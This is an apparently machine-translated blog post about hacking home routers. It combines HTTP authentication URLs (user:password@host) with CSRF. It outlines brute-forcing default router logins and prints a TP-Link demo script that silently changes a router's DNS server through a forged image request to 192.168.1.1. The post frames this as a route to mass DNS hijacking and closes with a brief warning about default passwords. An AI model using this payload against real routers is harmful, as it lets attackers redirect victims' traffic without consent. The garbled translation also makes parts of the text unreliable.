Http Authentication Url and csrf = Router Hacking

First, let's briefly describe what is Http Authentication. The server returns a 401 status and a WWW-Authenticate header.

 

The WWW-Authenticate header contains descriptions of the Http Authentication box, such

 

Enter the user name and password in the authentication box and put the password in the Authorization Header for sending

YWRtaW46YWRtaW4 = is the base64 encoding of admin: admin

 

Http Authentication, in fact, supports accessing and logging in the form of Http Authentication Url in all browsers earlier, that is

Http: // user: password @ url

To prevent phishing URLs, Microsoft has released a security patch to disable Http Authentication URLs. For details, see

Http://support.microsoft.com/kb/834489

 

After the popularization of science, let's look at some of the previous things. In the past few years, I have seen several cases of overseas black routes. Among them, flash upnp attack is a wonderful one, the port of the specified IP address in the Intranet is mapped out for attack. Of course, some Routing Vulnerabilities can also map out the WEB Management port of the route for attack, FLASH later fixed the security vulnerability.

 

Back to the question, we know that most domestic home routes use the Http Authentication method. For example, TPLINK routing is used, although IE disables the Http Authentication Url, however, firefox, chrome, and other browsers support Http Authentication URLs,At the same time, embedding the Http Authentication Url in the form of tags can force successful Http Authentication without any security promptSo an evil attack method came.

 

1. We can use the default IP address and default password of various routes in China to construct an Http Authentication Url brute force login script.

2. Use CSRF to modify the DNS of the route and direct it to our malicious DNS.

 

For example, the following tplink demo:

<Script>
Function dns (){
Alert ('I have changed your dns on my domain! ')
I = new Image;
I. src = 'HTTP: // 192.168.1.1/userRpm/LanDhcpServerRpm.htm? Dhcpserver = 1 & ip1 = 192.168.1.100 & ip2 = 192.168.1.199 & Lease = 120 & gateway = 0.0.0.0 & domain = & dnsserver = 8.8.8.8 & dnsserver2 = 0.0.0.0 & Save = % B1 % A3 + % B4 % E6 ';
}

</Script>

After tplink.html!

 

Secretly join a DNS server named 8.8.8.8!

 

How can a hacker use this attack to launch a large-scale attack? Tens of thousands of routes are silently modified to the DNS?

This is a common security issue. Do you have modified the default password for your vro? Fortunately, only firefox, chrome, and other browsers have such security issues.

 

From: RAyh4c Black Box